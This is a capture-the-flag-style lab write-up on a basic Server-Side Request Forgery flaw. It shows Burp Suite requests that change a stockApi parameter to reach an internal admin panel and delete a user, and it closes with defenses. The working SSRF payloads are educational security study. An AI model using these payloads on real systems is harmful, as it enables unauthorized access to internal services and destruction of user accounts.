[This lab](https://0a8900ef03dece6c818b16c3003f0081.web-security-academy.net/) demonstrates a **basic Server-Side Request Forgery (SSRF)** vulnerability where an application fetches server-side resources based on user input without proper validation. Our goal is to abuse the stock checking feature to **access an internal admin panel** and **delete the user `carlos`**.
---
#### 1. Recognize the Stock Check Mechanism
- Navigated to a product page.
- Found a **"Check stock"** button — this triggers a backend request (likely passing a `stockApi` parameter).
- Direct access to `/admin` via browser returns a **403 Forbidden** (expected — client-side blocked).
---
#### 2. Capture and Manipulate the Request
- **Intercepted** the stock check request in **Burp Suite**.
- Example request:
```http
POST /product/stock HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
stockApi=http://stock.weliketoshop.net/product/stock/check?productId=1
```
- **Sent to Repeater** for easier testing.
---
#### 3. Modify `stockApi` Parameter
- **Changed `stockApi`** to point to the internal admin panel:
```http
stockApi=http://localhost/admin
```
- **Response:** HTML of the admin panel loaded! 💥
![[CleanShot 2025-04-27 at 20.42.17.png]]
---
#### 4. Locate the Deletion Endpoint
- In the HTML, spotted something like:
```html
<a href="/admin/delete?username=carlos">Delete user carlos</a>
```
- The app expects a `GET` request to `/admin/delete?username=carlos`.
![[CleanShot 2025-04-27 at 20.42.55.png]]
---
#### 5. SSRF to Trigger User Deletion
- Crafted the **final payload**:
```http
stockApi=http://localhost/admin/delete?username=carlos
```
- Sent the request.
- Lab confirmed as **Solved** ✅.
---
#### Technical Breakdown
|Component|Description|
|---|---|
|**Vulnerability**|Server-Side Request Forgery (SSRF)|
|**Root Cause**|User input (`stockApi`) directly used in a server-side fetch, no validation on destination|
|**Impact**|Internal resources accessible, potentially escalating to full server control|
|**Defense**|Whitelist external domains, validate/normalize URLs, avoid trusting user input|
**Analogy:**
Think of SSRF like a gullible assistant: you tell them “go fetch this file,” and they will even go into the **boss’s private office** if you phrase it cleverly enough.